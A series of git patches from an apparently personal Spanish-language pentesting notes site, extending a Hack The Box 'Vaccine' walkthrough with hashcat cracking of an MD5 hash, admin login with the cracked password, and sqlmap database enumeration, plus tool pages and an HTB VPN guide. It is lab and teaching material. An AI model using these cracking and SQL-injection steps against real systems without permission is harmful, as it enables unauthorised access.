-This Code of Conduct applies both within project spaces and in public spaces when an individual is representing the project or its community. Examples of representing a project or community include using an official project e-mail address, posting via an official social media account, or acting as an appointed representative at an online or offline event. Representation of a project may be further defined and clarified by project maintainers.
-
-## Enforcement
-
-Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the project team at opensource@github.com. The project team will review and investigate all complaints, and will respond in a way that it deems appropriate to the circumstances. The project team is obligated to maintain confidentiality with regard to the reporter of an incident. Further details of specific enforcement policies may be posted separately.
-
-Project maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership.
-
-## Attribution
-
-This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4, available at [http://contributor-covenant.org/version/1/4][version]
-
-[homepage]: http://contributor-covenant.org
-[version]: http://contributor-covenant.org/version/1/4/
From 961a278d851c8ec50b7891cd92c71bd381c0940d Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Wed, 27 Apr 2022 10:36:16 +0200
Subject: [PATCH 0087/1701] Delete SUPPORT.md
---
docs/SUPPORT.md | 9 ---------
1 file changed, 9 deletions(-)
delete mode 100644 docs/SUPPORT.md
diff --git a/docs/SUPPORT.md b/docs/SUPPORT.md
deleted file mode 100644
index db7a5321ab3..00000000000
--- a/docs/SUPPORT.md
+++ /dev/null
@@ -1,9 +0,0 @@
-## Where to get help
-
-If you think you've found a bug in the Hacker theme, please [check the existing issues](https://github.com/pages-themes/hacker/issues), and if no one has reported the problem, [open a new issue](https://github.com/pages-themes/hacker/issues/new).
-
-If you have a general question about the theme, how to implement it, or how to customize it for your site you have two options:
-
-1. Search for your query on [`support.github.com`](https://support.github.com/?q=pages+Hacker+theme), which will also look for similar topics on [`github.community`](https://github.community/search?q=pages+Hacker+theme)
-2. Ask your question of the Jekyll community on [talk.jekyllrb.com](https://talk.jekyllrb.com/)
-3. [Contact GitHub Support](https://github.com/contact?form%5Bsubject%5D=GitHub%20Pages%20theme%20pages-themes/hacker)
From 2f4d935fecc045df3bdc21d32b62b78d9ea56400 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Wed, 27 Apr 2022 11:06:07 +0200
Subject: [PATCH 0088/1701] Update HTB-Vaccine.md
---
HTB-Vaccine.md | 16 ++++++++++++++++
1 file changed, 16 insertions(+)
diff --git a/HTB-Vaccine.md b/HTB-Vaccine.md
index 434f1a8c14b..c5d1a9819d3 100644
--- a/HTB-Vaccine.md
+++ b/HTB-Vaccine.md
@@ -299,6 +299,22 @@ Para ello, vamos a ver dos formas de crakear un hash, en primer lugar utilizarem
### HashCat:
+[HashCat](./HashCAt.html) es un descifrador de contraseña popular y eficaz. Mediante esta herramienta trataremos de descifrar el hash, en primer
+lugar, crearemos un arhivo llamado ´hash2´ donde guardamos el hash a descifrar.
+
+Para crear el archivo:
+
+ echo 'Número de Hash' > hash2
+
+En caso de no tener instalado HashCat:
+
+ sudo apt install hashcat
+
+Ahora debemos asegurarnos que tenemos el diccionario ´rockyou.txt´ en el direcctorio ´/usr/share/wordlists/´.
+
+Bien, ya lo tenemos todo preparado para ejecutar HashCat, para ello, ejecutamos el siguiente comando:
+
+ hashcat -a 0 -m 0 'Número Hash' /usr/share/wordlists/rockyou.txt
From 665b0ff84257432d03ebaaea37b00b3510ad37be Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Wed, 27 Apr 2022 11:08:01 +0200
Subject: [PATCH 0089/1701] Update HTB-Vaccine.md
---
HTB-Vaccine.md | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/HTB-Vaccine.md b/HTB-Vaccine.md
index c5d1a9819d3..f2d8578cb4c 100644
--- a/HTB-Vaccine.md
+++ b/HTB-Vaccine.md
@@ -265,7 +265,7 @@ Según la herramienta HashId el algoritmo de nuestro hash es un MD2, MD5 o MD4.
reporta los más probables, en ocasiones el primero en reportar no es el correcto. Para contrastar esta información
voy a mostraros otra herramienta que sirve para lo mismo, pero es un poco más precisa.
-### Hash-Identifier:
+### [Hash-Identifier:](./Hash-Identifier.html)
Está herramienta hace básicamente lo mismo que HashId, nos reporta el algoritmo del hash deseado, con la diferencia
de que Hash-Identifier es algo más precisa a la hora de reportar los resusltados.
@@ -300,7 +300,7 @@ Para ello, vamos a ver dos formas de crakear un hash, en primer lugar utilizarem
### HashCat:
[HashCat](./HashCAt.html) es un descifrador de contraseña popular y eficaz. Mediante esta herramienta trataremos de descifrar el hash, en primer
-lugar, crearemos un arhivo llamado ´hash2´ donde guardamos el hash a descifrar.
+lugar, crearemos un arhivo llamado `hash2` donde guardamos el hash a descifrar.
Para crear el archivo:
@@ -310,7 +310,7 @@ En caso de no tener instalado HashCat:
sudo apt install hashcat
-Ahora debemos asegurarnos que tenemos el diccionario ´rockyou.txt´ en el direcctorio ´/usr/share/wordlists/´.
+Ahora debemos asegurarnos que tenemos el diccionario ´rockyou.txt´ en el direcctorio `/usr/share/wordlists/`.
Bien, ya lo tenemos todo preparado para ejecutar HashCat, para ello, ejecutamos el siguiente comando:
From 4566517149d66e9247716d1efce6c1c52d268db0 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Wed, 27 Apr 2022 11:31:51 +0200
Subject: [PATCH 0090/1701] Update HTB-Vaccine.md
---
HTB-Vaccine.md | 42 +++++++++++++++++++++++++++++++++++++++---
1 file changed, 39 insertions(+), 3 deletions(-)
diff --git a/HTB-Vaccine.md b/HTB-Vaccine.md
index f2d8578cb4c..98e6b38af63 100644
--- a/HTB-Vaccine.md
+++ b/HTB-Vaccine.md
@@ -265,10 +265,11 @@ Según la herramienta HashId el algoritmo de nuestro hash es un MD2, MD5 o MD4.
reporta los más probables, en ocasiones el primero en reportar no es el correcto. Para contrastar esta información
voy a mostraros otra herramienta que sirve para lo mismo, pero es un poco más precisa.
-### [Hash-Identifier:](./Hash-Identifier.html)
+### Hash-Identifier:
Está herramienta hace básicamente lo mismo que HashId, nos reporta el algoritmo del hash deseado, con la diferencia
de que Hash-Identifier es algo más precisa a la hora de reportar los resusltados.
+Podéis encontrar más información aquí: [Hash Identifier](./Hash-Identifier.html)
Para instalar:
@@ -310,17 +311,52 @@ En caso de no tener instalado HashCat:
sudo apt install hashcat
-Ahora debemos asegurarnos que tenemos el diccionario ´rockyou.txt´ en el direcctorio `/usr/share/wordlists/`.
+Ahora debemos asegurarnos que tenemos el diccionario `rockyou.txt` en el direcctorio `/usr/share/wordlists/`.
+Podemos descargarnos o copiar el diccionario `rockyou.txt` en el siguiente enlace:
+https://www.kaggle.com/datasets/wjburns/common-password-list-rockyoutxt
Bien, ya lo tenemos todo preparado para ejecutar HashCat, para ello, ejecutamos el siguiente comando:
hashcat -a 0 -m 0 'Número Hash' /usr/share/wordlists/rockyou.txt
+-a : Attack-mode. El 0 representa el modo 'Straight'.
+-m : Hash-type. El 0 representa MD5. Esto lo podemos ver con el comando ´hashcat --help´.
+hash2 : Nombre del archivo que contiene el hash que queremos descifrar.
+rockyou.txt : Es un diccionario con más de 14 millones de contraseñas y hashes.
+
+
+Como podemos ver, Hashcat descifró la contraseña: qwerty789
+
+## Acceso al Sistema:
+
+Ya conocemos un usuario ´admin´ y una contraseña ´qwerty789´, con esta información vamos a volver a la página web donde nos
+aparecia una pagina de inicio de sesión y vamos a tratar de acceder utilizando estos datos.
+
+Genial, podemos ver como tenemos acceso como el usuaio ´admin´.
+
+Tras revisar el contenido de la página, vemos como el tablero no reporta nada especial, sin embargo, nos muestra un catálogo que
+podría estar conectado con la base de datos.
+
+Vamos a tratar de realizar algunas consultas y ver que ocurre:
+
+Al verificar la URL, podemos ver que hay una variable ´$search´ que es responsable de buscar en el catálogo.
+
+Tras ver esto, vamos a probar si es vulnerable a una inyeccion SQL, se puede hacer manualmente, pero para facilitarnos el trabajo
+usaremos una herramienta llamada ´Sqlmap´.
+
+## SQLMAP
+
+SQLmap es una herramienta de código abierto utilizada en pruebas de penetración para detectar y explotar fallas de inyección SQL. SQLmap automatiza
+el proceso de detección y explotación de inyección SQL. Los ataques de inyección de SQL pueden tomar el control de las bases de datos que utilizan SQL.
-
+Viene preinstalado con Parrot OS y Kali Linux, sin embargo, puede instalarlo a través del repositorio si no lo tiene:
+
+ vsudo apt install sqlmap
+
+
From 51ecd486396431a83de670a54f5c41c1afd3d0f4 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Wed, 27 Apr 2022 11:33:19 +0200
Subject: [PATCH 0091/1701] Update HTB-Vaccine.md
---
HTB-Vaccine.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/HTB-Vaccine.md b/HTB-Vaccine.md
index 98e6b38af63..c0aa7ede099 100644
--- a/HTB-Vaccine.md
+++ b/HTB-Vaccine.md
@@ -354,7 +354,7 @@ el proceso de detección y explotación de inyección SQL. Los ataques de inyecc
Viene preinstalado con Parrot OS y Kali Linux, sin embargo, puede instalarlo a través del repositorio si no lo tiene:
- vsudo apt install sqlmap
+ sudo apt install sqlmap
From d2a8a1d5b7cbaf9673158fcf3455042ab325d243 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Wed, 27 Apr 2022 11:38:54 +0200
Subject: [PATCH 0092/1701] Update HTB-Vaccine.md
---
HTB-Vaccine.md | 10 +++++-----
1 file changed, 5 insertions(+), 5 deletions(-)
diff --git a/HTB-Vaccine.md b/HTB-Vaccine.md
index c0aa7ede099..433a94505f6 100644
--- a/HTB-Vaccine.md
+++ b/HTB-Vaccine.md
@@ -321,7 +321,7 @@ Bien, ya lo tenemos todo preparado para ejecutar HashCat, para ello, ejecutamos
-a : Attack-mode. El 0 representa el modo 'Straight'.
--m : Hash-type. El 0 representa MD5. Esto lo podemos ver con el comando ´hashcat --help´.
+-m : Hash-type. El 0 representa MD5. Esto lo podemos ver con el comando `hashcat --help`.
hash2 : Nombre del archivo que contiene el hash que queremos descifrar.
@@ -332,20 +332,20 @@ Como podemos ver, Hashcat descifró la contraseña: qwerty789
## Acceso al Sistema:
-Ya conocemos un usuario ´admin´ y una contraseña ´qwerty789´, con esta información vamos a volver a la página web donde nos
+Ya conocemos un usuario `admin` y una contraseña `qwerty789`, con esta información vamos a volver a la página web donde nos
aparecia una pagina de inicio de sesión y vamos a tratar de acceder utilizando estos datos.
-Genial, podemos ver como tenemos acceso como el usuaio ´admin´.
+Genial, podemos ver como tenemos acceso como el usuaio `admin`.
Tras revisar el contenido de la página, vemos como el tablero no reporta nada especial, sin embargo, nos muestra un catálogo que
podría estar conectado con la base de datos.
Vamos a tratar de realizar algunas consultas y ver que ocurre:
-Al verificar la URL, podemos ver que hay una variable ´$search´ que es responsable de buscar en el catálogo.
+Al verificar la URL, podemos ver que hay una variable `$search` que es responsable de buscar en el catálogo.
Tras ver esto, vamos a probar si es vulnerable a una inyeccion SQL, se puede hacer manualmente, pero para facilitarnos el trabajo
-usaremos una herramienta llamada ´Sqlmap´.
+usaremos una herramienta llamada `Sqlmap`.
## SQLMAP
From 1362148ebebb4dc66429e313d7735dce4a55c111 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Wed, 27 Apr 2022 15:45:01 +0200
Subject: [PATCH 0093/1701] Delete README.md
---
README.md | 116 ------------------------------------------------------
1 file changed, 116 deletions(-)
delete mode 100644 README.md
diff --git a/README.md b/README.md
deleted file mode 100644
index 4c2fac074ba..00000000000
--- a/README.md
+++ /dev/null
@@ -1,116 +0,0 @@
-# The Hacker theme
-
-[](https://github.com/pages-themes/hacker/actions/workflows/ci.yaml) [](https://badge.fury.io/rb/jekyll-theme-hacker)
-
-*Hacker is a Jekyll theme for GitHub Pages. You can [preview the theme to see what it looks like](http://pages-themes.github.io/hacker), or even [use it today](#usage).*
-
-
-
-## Usage
-
-To use the Hacker theme:
-
-1. Add the following to your site's `_config.yml`:
-
- ```yml
- remote_theme: pages-themes/hacker@v0.2.0
- plugins:
- - jekyll-remote-theme # add this line to the plugins list if you already have one
- ```
-
-2. Optionally, if you'd like to preview your site on your computer, add the following to your site's `Gemfile`:
-
- ```ruby
- gem "github-pages", group: :jekyll_plugins
- ```
-
-## Customizing
-
-### Configuration variables
-
-Hacker will respect the following variables, if set in your site's `_config.yml`:
-
-```yml
-title: [The title of your site]
-description: [A short description of your site's purpose]
-```
-
-Additionally, you may choose to set the following optional variables:
-
-```yml
-show_downloads: ["true" or "false" (unquoted) to indicate whether to provide a download URL]
-google_analytics: [Your Google Analytics tracking ID]
-```
-
-### Stylesheet
-
-If you'd like to add your own custom styles:
-
-1. Create a file called `/assets/css/style.scss` in your site
-2. Add the following content to the top of the file, exactly as shown:
- ```scss
- ---
- ---
-
- @import "{{ site.theme }}";
- ```
-3. Add any custom CSS (or Sass, including imports) you'd like immediately after the `@import` line
-
-*Note: If you'd like to change the theme's Sass variables, you must set new values before the `@import` line in your stylesheet.*
-
-### Layouts
-
-If you'd like to change the theme's HTML layout:
-
-1. For some changes such as a custom `favicon`, you can add custom files in your local `_includes` folder. The files [provided with the theme](https://github.com/pages-themes/hacker/tree/master/_includes) provide a starting point and are included by the [original layout template](https://github.com/pages-themes/hacker/blob/master/_layouts/default.html).
-2. For more extensive changes, [copy the original template](https://github.com/pages-themes/hacker/blob/master/_layouts/default.html) from the theme's repository
(*Pro-tip: click "raw" to make copying easier*)
-3. Create a file called `/_layouts/default.html` in your site
-4. Paste the default layout content copied in the first step
-5. Customize the layout as you'd like
-
-### Customizing Google Analytics code
-
-Google has released several iterations to their Google Analytics code over the years since this theme was first created. If you would like to take advantage of the latest code, paste it into `_includes/head-custom-google-analytics.html` in your Jekyll site.
-
-### Overriding GitHub-generated URLs
-
-Templates often rely on URLs supplied by GitHub such as links to your repository or links to download your project. If you'd like to override one or more default URLs:
-
-1. Look at [the template source](https://github.com/pages-themes/hacker/blob/master/_layouts/default.html) to determine the name of the variable. It will be in the form of `{{ site.github.zip_url }}`.
-2. Specify the URL that you'd like the template to use in your site's `_config.yml`. For example, if the variable was `site.github.url`, you'd add the following:
- ```yml
- github:
- zip_url: http://example.com/download.zip
- another_url: another value
- ```
-3. When your site is built, Jekyll will use the URL you specified, rather than the default one provided by GitHub.
-
-*Note: You must remove the `site.` prefix, and each variable name (after the `github.`) should be indent with two space below `github:`.*
-
-For more information, see [the Jekyll variables documentation](https://jekyllrb.com/docs/variables/).
-
-## Roadmap
-
-See the [open issues](https://github.com/pages-themes/hacker/issues) for a list of proposed features (and known issues).
-
-## Project philosophy
-
-The Hacker theme is intended to make it quick and easy for GitHub Pages users to create their first (or 100th) website. The theme should meet the vast majority of users' needs out of the box, erring on the side of simplicity rather than flexibility, and provide users the opportunity to opt-in to additional complexity if they have specific needs or wish to further customize their experience (such as adding custom CSS or modifying the default layout). It should also look great, but that goes without saying.
-
-## Contributing
-
-Interested in contributing to Hacker? We'd love your help. Hacker is an open source project, built one contribution at a time by users like you. See [the CONTRIBUTING file](docs/CONTRIBUTING.md) for instructions on how to contribute.
-
-### Previewing the theme locally
-
-If you'd like to preview the theme locally (for example, in the process of proposing a change):
-
-1. Clone down the theme's repository (`git clone https://github.com/pages-themes/hacker`)
-2. `cd` into the theme's directory
-3. Run `script/bootstrap` to install the necessary dependencies
-4. Run `bundle exec jekyll serve` to start the preview server
-5. Visit [`localhost:4000`](http://localhost:4000) in your browser to preview the theme
-
-### Running tests
-
-The theme contains a minimal test suite, to ensure a site with the theme would build successfully. To run the tests, simply run `script/cibuild`. You'll need to run `script/bootstrap` once before the test script will work.
From 2e3ec18df6f59d54dfa1e7518acb6537c5ac5603 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Wed, 27 Apr 2022 16:47:04 +0200
Subject: [PATCH 0094/1701] Create SQLmap.md
---
SQLmap.md | 23 +++++++++++++++++++++++
1 file changed, 23 insertions(+)
create mode 100644 SQLmap.md
diff --git a/SQLmap.md b/SQLmap.md
new file mode 100644
index 00000000000..42629f27a26
--- /dev/null
+++ b/SQLmap.md
@@ -0,0 +1,23 @@
+
+
+# SQLMAP
+
+## ¿Qué es SQLMAP?
+
+Sqlmap es un software de código abierto que se utiliza para detectar y explotar las vulnerabilidades de las bases de datos y brinda opciones para
+inyectarles códigos maliciosos. Viene con un potente motor de detección al cual le podemos especificar distintas variables.
+
+### Características:
+
+Soporte completo para MySQL, Oracle, PostgreSQL y Microsoft SQL. Además de estos cuatro sistemas de gestión de bases de datos, sqlMap también puede
+identificar Microsoft Access, DB2, Informix, Sybase y Interbase.
+
+Amplia base de datos de sistema de gestión de huellas dactilares basadas en inband error messages, analizar el banner, las funciones de salida de
+comparación y características específicas tales como MySQL comment injection.
+
+También es posible forzar a la base de datos de sistema de gestión de nombre si ya lo saben.
+Soporte completo para 2 técnicas de SQL injection: blind SQL injection y inband SQL injection.
+
+
+
+
From cb5afe3538f3995ad8a1684a5027670a2507d033 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Wed, 27 Apr 2022 16:48:28 +0200
Subject: [PATCH 0095/1701] Update index.md
---
index.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/index.md b/index.md
index 6eb55903e89..ecc52d04f05 100644
--- a/index.md
+++ b/index.md
@@ -27,6 +27,8 @@
[WPScan](./WPScan.html)
+[SQLmap](./SQLmap.html)
+
# Artículos
[Fase de Reconocimiento - HTB](./Fase_de_reconocimiento-HTB.html)
From dce8e9f8dc44c06a48446ff389b78e70166ec88b Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Wed, 27 Apr 2022 16:57:54 +0200
Subject: [PATCH 0096/1701] Update SQLmap.md
---
SQLmap.md | 7 ++++++-
1 file changed, 6 insertions(+), 1 deletion(-)
diff --git a/SQLmap.md b/SQLmap.md
index 42629f27a26..a9ef957a22b 100644
--- a/SQLmap.md
+++ b/SQLmap.md
@@ -1,4 +1,4 @@
-
+
# SQLMAP
@@ -18,6 +18,11 @@ comparación y características específicas tales como MySQL comment injection.
También es posible forzar a la base de datos de sistema de gestión de nombre si ya lo saben.
Soporte completo para 2 técnicas de SQL injection: blind SQL injection y inband SQL injection.
+### Instalando SQLMAP:
+SQLMAP viene preinstalado con kali linux, que es la opción preferida de la mayoría de los probadores de penetración. Sin embargo, puede instalar sqlmap
+en otros sistemas Linux basados en Debian usando el comando:
+
+ sudo apt-get install sqlmap
From e637108463db5c6b8dfef59024cd43407d24ab9d Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Wed, 27 Apr 2022 17:05:45 +0200
Subject: [PATCH 0097/1701] Update SQLmap.md
---
SQLmap.md | 9 +++++++++
1 file changed, 9 insertions(+)
diff --git a/SQLmap.md b/SQLmap.md
index a9ef957a22b..6cf34675739 100644
--- a/SQLmap.md
+++ b/SQLmap.md
@@ -24,5 +24,14 @@ SQLMAP viene preinstalado con kali linux, que es la opción preferida de la mayo
en otros sistemas Linux basados en Debian usando el comando:
sudo apt-get install sqlmap
+
+# Ejecución de SQLMap:
+### Paso 1: Enumere información sobre las bases de datos existentes:
+ sqlmap -u [Url Víctima] --dbs
+
+Primero, debemos ingresar la URL web que queremos verificar junto con el parámetro -u. También podemos usar el parámetro –tor si deseamos probar el
+sitio web usando proxies. Ahora, por lo general, nos gustaría probar si es posible obtener acceso a una base de datos. Así que usamos la opción –dbs para hacerlo. –dbs enumera todas las bases de datos disponibles.
+
+Ejemplo: ´sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs´
From 90854b5f1771d6dab26fa45f4bde04169b8cd8cd Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Wed, 27 Apr 2022 17:06:13 +0200
Subject: [PATCH 0098/1701] Update SQLmap.md
---
SQLmap.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/SQLmap.md b/SQLmap.md
index 6cf34675739..22100c16f66 100644
--- a/SQLmap.md
+++ b/SQLmap.md
@@ -34,4 +34,4 @@ en otros sistemas Linux basados en Debian usando el comando:
Primero, debemos ingresar la URL web que queremos verificar junto con el parámetro -u. También podemos usar el parámetro –tor si deseamos probar el
sitio web usando proxies. Ahora, por lo general, nos gustaría probar si es posible obtener acceso a una base de datos. Así que usamos la opción –dbs para hacerlo. –dbs enumera todas las bases de datos disponibles.
-Ejemplo: ´sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs´
+Ejemplo: `sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs`
From 38d11057925901351dbe8b476311cf641a7d7d35 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Wed, 27 Apr 2022 17:19:08 +0200
Subject: [PATCH 0099/1701] Create Aria2
---
Aria2 | 22 ++++++++++++++++++++++
1 file changed, 22 insertions(+)
create mode 100644 Aria2
diff --git a/Aria2 b/Aria2
new file mode 100644
index 00000000000..7b7f8b6760e
--- /dev/null
+++ b/Aria2
@@ -0,0 +1,22 @@
+# Aria2
+
+### ¿Qué es Aria2?
+
+Se trata de una herramienta para descargar archivos por torrent desde la terminal. Es un método sencillo pero tiene la desventaja de que puede descargar
+pocos torrents al mismo tiempo, ya que si tratamos de descargar varios al mismo tiempo la velocidad de descarga se ve muy afectada.
+
+### Instalar:
+
+ sudo apt install aria2
+
+### Para descargar archivos.torrent:
+
+Podemos realizar la descarga con un archivo .torrent:
+
+ aria2c "archivo.torrent"
+
+Tambien podemos descargar el torrent directamente con la url:
+
+ aria2c "URL del Torrent"
+
+Los archvios descargados se guardan de forma automática en el directorio `/home/user/`.
From ea5b9b71adedf28a9707a2e5cb06101a48895d93 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Wed, 27 Apr 2022 17:32:03 +0200
Subject: [PATCH 0100/1701] Update index.md
---
index.md | 16 +++++++++-------
1 file changed, 9 insertions(+), 7 deletions(-)
diff --git a/index.md b/index.md
index ecc52d04f05..5a686591c72 100644
--- a/index.md
+++ b/index.md
@@ -11,22 +11,24 @@
# Herramientas y Scripts
-[WichSystem](./WichSystem.html)
+### Reporte y reconocimiento:
-[ExtractPorts](./ExtractPorts.html)
+[WichSystem](./WichSystem.html) [ExtractPorts](./ExtractPorts.html)
-[php-reverse-shell.php](./php-reverse-shell.html)
+### Shells:
-[John the Ripper](./john_the_ripper.html)
+[php-reverse-shell.php](./php-reverse-shell.html)
-[HashID](./HashId.html)
+### Hash:
-[Hash Identifier](./Hash-Identifier.html)
+[John the Ripper](./john_the_ripper.html) [HashID](./HashId.html) [Hash Identifier](./Hash-Identifier.html) [HashCat](./HashCat.html)
-[HashCat](./HashCat.html)
+### WordPress:
[WPScan](./WPScan.html)
+### SQL:
+
[SQLmap](./SQLmap.html)
# Artículos
From dbb55b072255c6d2ceee2fc98cf733ddbf5b5910 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Wed, 27 Apr 2022 17:35:34 +0200
Subject: [PATCH 0101/1701] Update index.md
---
index.md | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/index.md b/index.md
index 5a686591c72..0a419c1e0f2 100644
--- a/index.md
+++ b/index.md
@@ -13,7 +13,7 @@
### Reporte y reconocimiento:
-[WichSystem](./WichSystem.html) [ExtractPorts](./ExtractPorts.html)
+[WichSystem](./WichSystem.html) [ExtractPorts](./ExtractPorts.html)
### Shells:
@@ -21,7 +21,7 @@
### Hash:
-[John the Ripper](./john_the_ripper.html) [HashID](./HashId.html) [Hash Identifier](./Hash-Identifier.html) [HashCat](./HashCat.html)
+[John the Ripper](./john_the_ripper.html) [HashID](./HashId.html) [Hash Identifier](./Hash-Identifier.html) [HashCat](./HashCat.html)
### WordPress:
From 46fa0ca23c302ee488d7ab38c536123d8bbba8db Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Wed, 27 Apr 2022 17:39:01 +0200
Subject: [PATCH 0102/1701] Update index.md
---
index.md | 8 ++++++--
1 file changed, 6 insertions(+), 2 deletions(-)
diff --git a/index.md b/index.md
index 0a419c1e0f2..2824ee1a129 100644
--- a/index.md
+++ b/index.md
@@ -13,7 +13,8 @@
### Reporte y reconocimiento:
-[WichSystem](./WichSystem.html) [ExtractPorts](./ExtractPorts.html)
+1.[WichSystem](./WichSystem.html)
+2.[ExtractPorts](./ExtractPorts.html)
### Shells:
@@ -21,7 +22,10 @@
### Hash:
-[John the Ripper](./john_the_ripper.html) [HashID](./HashId.html) [Hash Identifier](./Hash-Identifier.html) [HashCat](./HashCat.html)
+1.[John the Ripper](./john_the_ripper.html)
+2.[HashID](./HashId.html)
+3.[Hash Identifier](./Hash-Identifier.html)
+4.[HashCat](./HashCat.html)
### WordPress:
From 7b324ba003a9bc08885861b5275b3b0d1ebe2c0f Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Wed, 27 Apr 2022 17:40:57 +0200
Subject: [PATCH 0103/1701] Update index.md
---
index.md | 3 +++
1 file changed, 3 insertions(+)
diff --git a/index.md b/index.md
index 2824ee1a129..4cb4588203c 100644
--- a/index.md
+++ b/index.md
@@ -8,6 +8,7 @@
[HTB-Vaccine](./HTB-Vaccine.html)
+---
# Herramientas y Scripts
@@ -35,6 +36,8 @@
[SQLmap](./SQLmap.html)
+---
+
# Artículos
[Fase de Reconocimiento - HTB](./Fase_de_reconocimiento-HTB.html)
From 5cdff3f1707f87776dcdbbb9bba61332c7270de1 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Thu, 28 Apr 2022 19:20:29 +0200
Subject: [PATCH 0104/1701] Create Como conectarse a HTB.md
---
Como conectarse a HTB.md | 17 +++++++++++++++++
1 file changed, 17 insertions(+)
create mode 100644 Como conectarse a HTB.md
diff --git a/Como conectarse a HTB.md b/Como conectarse a HTB.md
new file mode 100644
index 00000000000..f4845f5ff55
--- /dev/null
+++ b/Como conectarse a HTB.md
@@ -0,0 +1,17 @@
+# Como conectarse a las máquinas de Hack the Box por VPN:
+
+[https://www.hackthebox.com/](https://www.hackthebox.com/)
+
+En este artículo os mostraré como conectarse a cualquier servicio de HTB (Hack The Box) a traves de sus VPN.
+HTB utiliza VPN para los disntintos servicios que se utilizan. A groso modo, las `starting_points` utilizan una VPV, las `máquinas` utilizan otras
+y así con cada uno de los dinstintos grupos de servicio que ofrecen, como su `academia`, los `battlegrounds`, etc.
+
+En primer lugar, debemos estar registrados en la plataforma, la plataforma ofrece una gran cantidad de máquinas gratuitas, y luego, también nos ofrece
+distintas versiones de pago las culaes ofrecen grandes ventajas, mallor número de máquinas, nos da la opción de realizar máquinas retiradas, más clases
+y muchas otros productos. Todo esto lo podemos ver en la misma página de inicio de Hack the Box.
+
+
+
+
+
+
From 3f3fb36798e51ed089832c1970090ed3127bb017 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Thu, 28 Apr 2022 20:03:42 +0200
Subject: [PATCH 0105/1701] Update Como conectarse a HTB.md
---
Como conectarse a HTB.md | 58 +++++++++++++++++++++++++++++++++++++---
1 file changed, 54 insertions(+), 4 deletions(-)
diff --git a/Como conectarse a HTB.md b/Como conectarse a HTB.md
index f4845f5ff55..64bf93984f6 100644
--- a/Como conectarse a HTB.md
+++ b/Como conectarse a HTB.md
@@ -2,16 +2,66 @@
[https://www.hackthebox.com/](https://www.hackthebox.com/)
-En este artículo os mostraré como conectarse a cualquier servicio de HTB (Hack The Box) a traves de sus VPN.
-HTB utiliza VPN para los disntintos servicios que se utilizan. A groso modo, las `starting_points` utilizan una VPV, las `máquinas` utilizan otras
-y así con cada uno de los dinstintos grupos de servicio que ofrecen, como su `academia`, los `battlegrounds`, etc.
+En este artículo os mostraré como conectarse a cualquier servicio de HTB (Hack The Box) a través de sus VPN.
+HTB utiliza VPN para los distintos servicios que se utilizan. Resumiendo, las `starting_points` utilizan una VPV, las `máquinas` usan otras
+y así con cada uno de los distintos grupos de servicio que ofrecen, como su `academia`, los `battlegrounds`, etc.
En primer lugar, debemos estar registrados en la plataforma, la plataforma ofrece una gran cantidad de máquinas gratuitas, y luego, también nos ofrece
-distintas versiones de pago las culaes ofrecen grandes ventajas, mallor número de máquinas, nos da la opción de realizar máquinas retiradas, más clases
+distintas versiones de pago, las cuales ofrecen grandes ventajas, mayor número de máquinas, nos da la opción de realizar máquinas retiradas, más clases
y muchas otros productos. Todo esto lo podemos ver en la misma página de inicio de Hack the Box.
+Para conectarnos con HTB primero tendremos que descargarnos un archivo .ovpn que HTB nos proporcionará. Para ello, desde nuestra página, una vez hemos
+ingresado, nos dirigimos al boton que se encuentra arriba a la derecha que pone `Connect to HTB`:
+
+Dependiendo del tipo de servicio que queremos realizar, nos descargamos una u otra, en el caso de querer realizar una máquina nos descargaremos
+el archivo de la pestaña `máquinas`, en nuestro caso, como estamos empezando, primero realizaremos las máquinas de introducción que son las
+`starting_points`, para ello entramos en su pestaña:
+
+Si disponemos de una máquina Linux o de algún entorno virtual (Virtual Box, VMware,etc) desde el cual vamos a acceder (ya sea con ParrotOS, Kali, Arch o
+cualquier distribución Linux) nos descargaremos la versión `OpenVPN`:
+
+
+Aquí simplemente establecemos nuestra región, que nos conectamos a través de una VPN y que vamos a utilizar el protocolo `UDP` (En caso de no funcionaros
+probar el protocolo TCP), luego presionamos `Download VPN`:
+
+
